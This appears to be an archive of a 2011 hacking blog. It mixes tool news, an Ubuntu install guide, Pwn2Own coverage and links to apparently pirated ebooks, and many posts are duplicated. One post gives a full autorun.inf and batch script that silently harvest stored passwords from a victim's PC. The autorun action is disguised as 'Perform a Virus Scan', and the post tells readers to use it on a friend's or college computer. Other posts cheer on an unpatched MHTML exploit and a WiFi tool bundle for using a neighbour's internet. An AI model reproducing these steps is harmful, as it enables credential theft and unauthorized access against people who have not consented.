Tuesday, March 29, 2011

A penetration test by Metasploit and see the alarm monitoring in Snort

In the previous episode we saw how to do adjust Snort, but we did not see it if working or not, and today we monitor the results when attack Windows XP with metasploit in Video.


 Metasploit


The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

http://en.wikipedia.org/wiki/Metasploit_Project 

 ms08_067_netapi

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Usage information




More Information about this exploit


Video





Saturday, March 26, 2011

What Is Sandboxie and The Benefits Of The Isolated Sandbox


 What Is Sandboxie and The Benefits Of The Isolated Sandbox


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.
 
What Is Sandboxie?
The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.



Benefits of the Isolated Sandbox
Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.





I would like to say thank you and highly appreciate your support. Please subscribe from the link bottom to appreciate my work and get the daily updates. Thank You. Happy Ethical Hacking Subscribe to Free Ultimate Download by Email

Wednesday, March 23, 2011

Installing Ubuntu - A tutorial for All





Recently I installed Ubuntu [Linux] as a dual boot OS with Seven already installed on my Machine. I faced a lot of problems, but the end result was worth all the trouble as Ubuntu rocks

In this thread I will post the step by step method to install Ubuntu (or any of its other versions such as Mint) as a dual boot OS on Seven machine. I will also specify some mistakes I made and what I learned outta those.

The first step to install Ubuntu was to creat a partition on my existing hard drive. There are two ways how you can do it in Seven:

1. In built 'Shrink Disc' feature in Seven
2. Use a disk partition software to do it for you.

Ubuntu or Mint comes with an inbuilt disk partitioner. What is required is a unallocated free space on your hard drive so that it can be partitioned while installing Ubuntu.

1. Making Space using "Shrink Disc" feature in Seven:
a. Log on to Seven.
b. Right-Click on "My computer" in the main menu and select "Manage"
c. It will ask for administrator password, enter it and click "allow"
d. Click on Disc Management.
e. There is will show the available partitions and external storage devices if any
f. Right Click on the disc partition you want to shrink and select "shrink volume"
g. Seven will assess how much space can be made free.
h. It will suggest the value which can be made free. Be sure that this is at least 10-15 GB. If you dont have this space, you will have to delete some data to make space for the partition.
i. Then select "shrink"
j. Seven will shrink the volume and show the new freed space as "unallocated" space.
k. After this close the window. You are done with shrinking

2. Making Space using a Disk Partition software:
a. I had problem that Seven used to say "access denied" when I tried to shrink the main C: Drive (I had only on partition )
b. So I used a Free Disk Partition Software to shrink the space.
c. You can use the following software: EasyUS partition Master-Home Edition which you can download here:
d. Using this it is easy to create space for a new partition.
e. Using the above program, select the partition you want to shrink/resize
f. Using the "Resize" tool you can shrink the volume and the rest of the space would be shown as "unallocated space"
g. Apply the changes and you are done


The next step is to install Ubuntu

1. You will need to download the latest ISO for Ubuntu or Mint from here:

2. You will need to burn this ISO image on to a CD (700 MB or more).
3. For burning this ISO you will have to use an ISO burning software. One such free software is: Free ISO burner:
4. Be sure to burn the ISO image at a very slow speed. This extra time spent will help you install Linux trouble-free.
5. When the disc is ready, restart the computer. Be sure that in BIOS setup the CD drive is above the hard disc in boot priority.
6. Once restarted the disc will boot before the hard disc.
7. In the menu that is displayed, select "run installer" and follow the instructions.
8. Once you have selected language, Location and Keyboard configuration....the disk partitioner of ubuntu will run and show you various options as to where Ubuntu should be installed.
9. Select "Largest continuous free space" as this will select the "unallocated space" that we have created in the earlier step.
10. After this follow the next instructions to complete the installation.
11. The installation will prompt you to import the settings from Seven. If you want do import these.
12. I preferred not to import as it will copy the documents from Seven partition to the new partition of Ubuntu and just eat up the partition space. You can always access the Seven documents from Ubuntu as Seven partion will be shown as a hard disk in "My computer".
13. Complete the installation. It will prompt to restart the computer. Do so.
14. After restart, the menu will show Ubuntu and Seven a dual boot OS and now you are free to choose the OS you want to load

Installing Ubuntu - A tutorial for All





Recently I installed Ubuntu [Linux] as a dual boot OS with Seven already installed on my Machine. I faced a lot of problems, but the end result was worth all the trouble as Ubuntu rocks

In this thread I will post the step by step method to install Ubuntu (or any of its other versions such as Mint) as a dual boot OS on Seven machine. I will also specify some mistakes I made and what I learned outta those.

The first step to install Ubuntu was to creat a partition on my existing hard drive. There are two ways how you can do it in Seven:

1. In built 'Shrink Disc' feature in Seven
2. Use a disk partition software to do it for you.

Ubuntu or Mint comes with an inbuilt disk partitioner. What is required is a unallocated free space on your hard drive so that it can be partitioned while installing Ubuntu.

1. Making Space using "Shrink Disc" feature in Seven:
a. Log on to Seven.
b. Right-Click on "My computer" in the main menu and select "Manage"
c. It will ask for administrator password, enter it and click "allow"
d. Click on Disc Management.
e. There is will show the available partitions and external storage devices if any
f. Right Click on the disc partition you want to shrink and select "shrink volume"
g. Seven will assess how much space can be made free.
h. It will suggest the value which can be made free. Be sure that this is at least 10-15 GB. If you dont have this space, you will have to delete some data to make space for the partition.
i. Then select "shrink"
j. Seven will shrink the volume and show the new freed space as "unallocated" space.
k. After this close the window. You are done with shrinking

2. Making Space using a Disk Partition software:
a. I had problem that Seven used to say "access denied" when I tried to shrink the main C: Drive (I had only on partition )
b. So I used a Free Disk Partition Software to shrink the space.
c. You can use the following software: EasyUS partition Master-Home Edition which you can download here:
d. Using this it is easy to create space for a new partition.
e. Using the above program, select the partition you want to shrink/resize
f. Using the "Resize" tool you can shrink the volume and the rest of the space would be shown as "unallocated space"
g. Apply the changes and you are done


The next step is to install Ubuntu

1. You will need to download the latest ISO for Ubuntu or Mint from here:

2. You will need to burn this ISO image on to a CD (700 MB or more).
3. For burning this ISO you will have to use an ISO burning software. One such free software is: Free ISO burner:
4. Be sure to burn the ISO image at a very slow speed. This extra time spent will help you install Linux trouble-free.
5. When the disc is ready, restart the computer. Be sure that in BIOS setup the CD drive is above the hard disc in boot priority.
6. Once restarted the disc will boot before the hard disc.
7. In the menu that is displayed, select "run installer" and follow the instructions.
8. Once you have selected language, Location and Keyboard configuration....the disk partitioner of ubuntu will run and show you various options as to where Ubuntu should be installed.
9. Select "Largest continuous free space" as this will select the "unallocated space" that we have created in the earlier step.
10. After this follow the next instructions to complete the installation.
11. The installation will prompt you to import the settings from Seven. If you want do import these.
12. I preferred not to import as it will copy the documents from Seven partition to the new partition of Ubuntu and just eat up the partition space. You can always access the Seven documents from Ubuntu as Seven partion will be shown as a hard disk in "My computer".
13. Complete the installation. It will prompt to restart the computer. Do so.
14. After restart, the menu will show Ubuntu and Seven a dual boot OS and now you are free to choose the OS you want to load

Sunday, March 20, 2011

Hack Passwords Using USB Drive

Today we will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.




MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt


start mailpv.exe /stext mailpv.txt


start iepv.exe /stext iepv.txt


start pspv.exe /stext pspv.txt


start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from "New Text Document.txt" to "launch.bat"

Copy the launch.bat file also to your USB drive.

Or download all the files directly through this link , extract them and copy all the  files to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Source

Thursday, March 17, 2011

Hacking Exposed: Web Applications Ebook 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures

download: Hacking Exposed: Web Applications Ebook 3rd Edition
FileSonic.com     letitbit.net

Hacking Exposed: Web Applications, 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures 


download:FileSonic.com     letitbit.net

Monday, March 14, 2011

IPAD 2 JAILBROKEN IN JUST ONE WEEK

Hackers have already managed to break open Apple's latest iPad, with developer and hacker Comex saying he had managed to do so remotely over the weekend. While proof of the jailbreak has shown up in photos and video on the Internet, it will not be made available immediately as it must be packaged for public use.

According to talk on Twitter, versions for both the Wi-Fi and 3G models of the iPad could be released shortly, although no specific date for its release has been given.

While the speed of the jailbreak may be surprising, iOS 4.3 (which the iPad runs on) had also been cracked open quickly: hackers there only needed about 24 hours. In that case developers likely had access to beta versions of the operating system, allowing those working on the crack to test out their work before iOS 4.3's actual release.


Details on the actual jailbreak have not been disclosed, probably to prevent Apple from moving quickly to close the hole. "Would've had it yesterday if I didn't have to spend 1.5 days looking for a replacement exploit (which came from a most unexpected place…)," Comex tweeted Sunday.

He also used a friend's iPad nearly 2,500 miles away and jailbroke it remotely, meaning whatever was done to hack the tablet device may be able to be done akin to what the iPhone Dev Team did with jailbreakme.com last August.

As always, jailbreaking any iOS device comes with risks. There is no guarantee that the hack will work on every device, and updates can sometimes cause the hack to stop working. Additionally, Apple's warranty becomes void if a device is jailbroken.

IPAD 2 JAILBROKEN IN JUST ONE WEEK

Hackers have already managed to break open Apple's latest iPad, with developer and hacker Comex saying he had managed to do so remotely over the weekend. While proof of the jailbreak has shown up in photos and video on the Internet, it will not be made available immediately as it must be packaged for public use.

According to talk on Twitter, versions for both the Wi-Fi and 3G models of the iPad could be released shortly, although no specific date for its release has been given.

While the speed of the jailbreak may be surprising, iOS 4.3 (which the iPad runs on) had also been cracked open quickly: hackers there only needed about 24 hours. In that case developers likely had access to beta versions of the operating system, allowing those working on the crack to test out their work before iOS 4.3's actual release.


Details on the actual jailbreak have not been disclosed, probably to prevent Apple from moving quickly to close the hole. "Would've had it yesterday if I didn't have to spend 1.5 days looking for a replacement exploit (which came from a most unexpected place…)," Comex tweeted Sunday.

He also used a friend's iPad nearly 2,500 miles away and jailbroke it remotely, meaning whatever was done to hack the tablet device may be able to be done akin to what the iPhone Dev Team did with jailbreakme.com last August.

As always, jailbreaking any iOS device comes with risks. There is no guarantee that the hack will work on every device, and updates can sometimes cause the hack to stop working. Additionally, Apple's warranty becomes void if a device is jailbroken.

MHTML EXPLOIT LATEST MICROSOFT BUG :P

Latest microsoft MHTML exploit is in fashion for hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.
mhtml exploit



MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Now we are finding that Microsoft and Google are working to create a fix on the server side so it can reduce the risk of MHTML Vulnerability, while you can check your machine to determine if you are vulnerable by using the test scenario previously posted by Microsoft.

As a workaround user can also disable ActiveX, but this would affect web applications including banking and e-commerce sites that use ActiveX to provide online services.
 May be a sad news for normal users but :D you know what i mean to say enjoy the exploit guys its not patched yet :P

MHTML EXPLOIT LATEST MICROSOFT BUG :P

Latest microsoft MHTML exploit is in fashion for hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.



MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Now we are finding that Microsoft and Google are working to create a fix on the server side so it can reduce the risk of MHTML Vulnerability, while you can check your machine to determine if you are vulnerable by using the test scenario previously posted by Microsoft.

As a workaround user can also disable ActiveX, but this would affect web applications including banking and e-commerce sites that use ActiveX to provide online services.
 May be a sad news for normal users but :D you know what i mean to say enjoy the exploit guys its not patched yet :P

All in one WIFI Hack 2011

All in one WIFI Hack 2011 newest updated version + tutorial

This tool has many different tools to hack and crack wifi so
you can use your neighbours internet and do whatever.

Tools for Windows and Linux also some nice extra tools !

Wifi Windows Hacks:
+ Aircrack
+ Wireshark
+ Ettercap
+ Netstumbler
+ Airsnare
+ WIFIfofum
+ Wdriver
+ Pong
+ CommView
+ Airsnort
+ AiroPeek
+ Knsgem 2
+ Aptools

Wifi Linux Hacks:
+ Airpwn
+ WEPcrack
+ Prismstumbler
+ WIFIscanner
+ Airfart
+ Magicmap
+ WPA-cracker
+ Wellenreiter
+ Void
+ Kismet
+ Cowpatty
+ WIFIzoo

100% testing and woking perfectly !

Saturday, March 12, 2011

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is having the annual Pwn2Own contest March 9th, 10th, and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle – seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year will be 4 popular web browsers and 4 mobile devices.

Browers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:
  • Microsoft Internet Explorer
  • Apple Safari
  • Mozilla Firefox
  • Google Chrome
Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:
  • Dell Venue Pro running Windows 7
  • iPhone 4 running iOS
  • Blackberry Torch 9800 running Blackberry 6 OS
  • Nexus S running Android
As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.
Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that


The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The exploit used to exploit IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

the Apple iPhone 4 and RIM’s Blackberry Torch 9800 were both successfully compromised on day 2 of the contest.
Android and Windows Phone 7 based devices survived the challenge.
It was a vulnerability in WebKit that allowed the Blackberry to be compromised. Google has responded by patching the exploit in their WebKit-based Google Chrome.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.

 

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is having the annual Pwn2Own contest March 9th, 10th, and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle – seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year will be 4 popular web browsers and 4 mobile devices.

Browers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:
  • Microsoft Internet Explorer
  • Apple Safari
  • Mozilla Firefox
  • Google Chrome
Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:
  • Dell Venue Pro running Windows 7
  • iPhone 4 running iOS
  • Blackberry Torch 9800 running Blackberry 6 OS
  • Nexus S running Android
As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.
Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that


The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The exploit used to exploit IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

the Apple iPhone 4 and RIM’s Blackberry Torch 9800 were both successfully compromised on day 2 of the contest.
Android and Windows Phone 7 based devices survived the challenge.
It was a vulnerability in WebKit that allowed the Blackberry to be compromised. Google has responded by patching the exploit in their WebKit-based Google Chrome.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.

 

Thursday, March 10, 2011

W3af – Web Application Attack and Audit Framework

 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .  




 If you are here just to "take a look" please watch the w3af video demos!


A nice tool to check web applications and a good frame work to carry out your tests. It is what Metasploit is for Network Penetration Testing.


 w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much more


 This tools lags a bit for windows but as its open source you cant complain :P Although runs smoothly on linux


You can download W3AF here

W3af – Web Application Attack and Audit Framework

 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .   




 If you are here just to "take a look" please watch the w3af video demos!


A nice tool to check web applications and a good frame work to carry out your tests. It is what Metasploit is for Network Penetration Testing.


 w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much more


 This tools lags a bit for windows but as its open source you cant complain :P Although runs smoothly on linux


You can download W3AF here

Mastering the Nmap Scripting Engine-Defcon 18



Most hackers can use Nmap for simple port scanning and OS detection, but the Nmap Scripting Engine (NSE) takes scanning to a whole new level. Nmap's high-speed networking engine can now spider web sites for SQL injection vulnerabilities, brute-force crack and query MSRPC services, find open proxies, and more. Nmap includes more than 130 NSE scripts for network discovery, vulnerability detection, exploitation, and authentication cracking.

Rather than give a dry overview of NSE, Fyodor and Nmap co-maintainer David Fifield demonstrate practical solutions to common problems. They have scanned millions of hosts with NSE and discuss vulnerabilities found on enterprise networks and how Nmap can be used to quickly detect those problems on your own systems. Then they demonstrate how easy it is to write custom NSE scripts by writing one from scratch and using it to hack a webcam. All in 38 minutes, as given live at Defcon 18!

Mastering the Nmap Scripting Engine-Defcon 18



Most hackers can use Nmap for simple port scanning and OS detection, but the Nmap Scripting Engine (NSE) takes scanning to a whole new level. Nmap's high-speed networking engine can now spider web sites for SQL injection vulnerabilities, brute-force crack and query MSRPC services, find open proxies, and more. Nmap includes more than 130 NSE scripts for network discovery, vulnerability detection, exploitation, and authentication cracking.

Rather than give a dry overview of NSE, Fyodor and Nmap co-maintainer David Fifield demonstrate practical solutions to common problems. They have scanned millions of hosts with NSE and discuss vulnerabilities found on enterprise networks and how Nmap can be used to quickly detect those problems on your own systems. Then they demonstrate how easy it is to write custom NSE scripts by writing one from scratch and using it to hack a webcam. All in 38 minutes, as given live at Defcon 18!

Tuesday, March 8, 2011

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers — those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zukerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.

About the Author
Levy is a senior writer for Wired. Previously, he was chief technology writer and a senior editor for Newsweek. Levy has written six books and had articles published in Harper’s, Macworld, The New York Times Magazine, The New Yorker, Premiere, and Rolling Stone. Steven has won several awards during his 30+ years of writing about technology, including Hackers, which PC Magazine named the best Sci-Tech book written in the last twenty years and, Crypto, which won the grand eBook prize at the 2001 Frankfurt Book festival.

 Download :http://www.megaupload.com/?d=GZQ2G2F0
                   http://depositfiles.com/en/files/f3canuqmj

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers — those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zukerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.

About the Author
Levy is a senior writer for Wired. Previously, he was chief technology writer and a senior editor for Newsweek. Levy has written six books and had articles published in Harper’s, Macworld, The New York Times Magazine, The New Yorker, Premiere, and Rolling Stone. Steven has won several awards during his 30+ years of writing about technology, including Hackers, which PC Magazine named the best Sci-Tech book written in the last twenty years and, Crypto, which won the grand eBook prize at the 2001 Frankfurt Book festival.


 Download :http://www.megaupload.com/?d=GZQ2G2F0
                   http://depositfiles.com/en/files/f3canuqmj

Monday, March 7, 2011

METASPLOIT v 3.6 RELEASED

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities.


Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online here  

METASPLOIT v 3.6 RELEASED

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities.


Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online here  

GNACKTRACK R6

GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME!

 This version patches the compat-wireless modules, providing better support for injection and monitor mode. A Windows XP styled theme has also been included, allowing you to quickly emulate an Windows XP box!



r6 is the recent version of gnactrack

You can download GNACTRACKR6 here

GNACKTRACK R6

GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME!

 This version patches the compat-wireless modules, providing better support for injection and monitor mode. A Windows XP styled theme has also been included, allowing you to quickly emulate an Windows XP box!





You can download GNACTRACKR6 here

NMAP-ADVANCED & BASIC FINGERPRINTING

